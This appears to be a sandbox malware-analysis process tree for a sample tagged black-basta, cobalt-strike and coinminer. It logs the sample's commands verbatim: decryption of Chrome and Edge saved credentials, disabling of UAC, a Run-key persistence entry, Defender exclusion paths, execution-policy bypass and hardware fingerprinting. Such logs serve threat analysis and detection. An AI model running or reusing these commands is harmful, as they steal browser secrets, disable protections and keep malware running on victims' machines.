      C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
      4⤵
      PID:1276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:2152
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:1056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:5224
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:3192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:4700
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:724
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:2288
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:1016
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:5456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:4700
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:2616
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:5604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\zoE2fjjKAE.ps1""
      4⤵
      PID:2040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\zoE2fjjKAE.ps1"
        5⤵
        
        PID:1064
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gpr5n2o3\gpr5n2o3.cmdline"
        6⤵
        
        PID:4924
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D95.tmp" "c:\Users\Admin\AppData\Local\Temp\gpr5n2o3\CSC33E5108DA1E406C8551AC26234EE15.TMP"
        7⤵
        
        PID:1020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:3452
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5424
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:3772
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:5096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2128
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:3140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:1720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5760
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5928
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:2152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.LImLuQTWcS""
      4⤵
      PID:5688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.LImLuQTWcS"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:1276
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        
        PID:5544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3888
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5176
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:2144
  - - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:4452
    - - C:\Windows\Temp\{7D56B948-1062-4285-AB06-C1C62F536872}\.cr\python-installer.exe
        
        "C:\Windows\Temp\{7D56B948-1062-4285-AB06-C1C62F536872}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=552 -burn.filehandle.self=544 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        5⤵
        
        PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:5764
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:3348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:5420
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:4928
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:5140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:5380
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:1212
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:1700
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  PID:384
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    PID:5992
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:5192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:6028
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  PID:5412
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    PID:2168
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250404041341.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      PID:1964
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1264
        5⤵
        Program crash
        
        PID:5500

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:928
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:4868
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:3496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\cy7IdRd5FJ.ps1""
      4⤵
      PID:5696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\cy7IdRd5FJ.ps1"
        5⤵
        
        PID:2380
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jaexsbox\jaexsbox.cmdline"
        6⤵
        
        PID:1484
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A09.tmp" "c:\Users\Admin\AppData\Local\Temp\jaexsbox\CSC21DDAFAC280348B8A95F724F6670DE2E.TMP"
        7⤵
        
        PID:3080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:3800
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:1984
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:5484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4348
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:5152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:2888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:6040
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4068
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:2220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.t71yP6eKnu""
      4⤵
      PID:4124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.t71yP6eKnu"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:4964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        
        PID:5412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1104
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5124
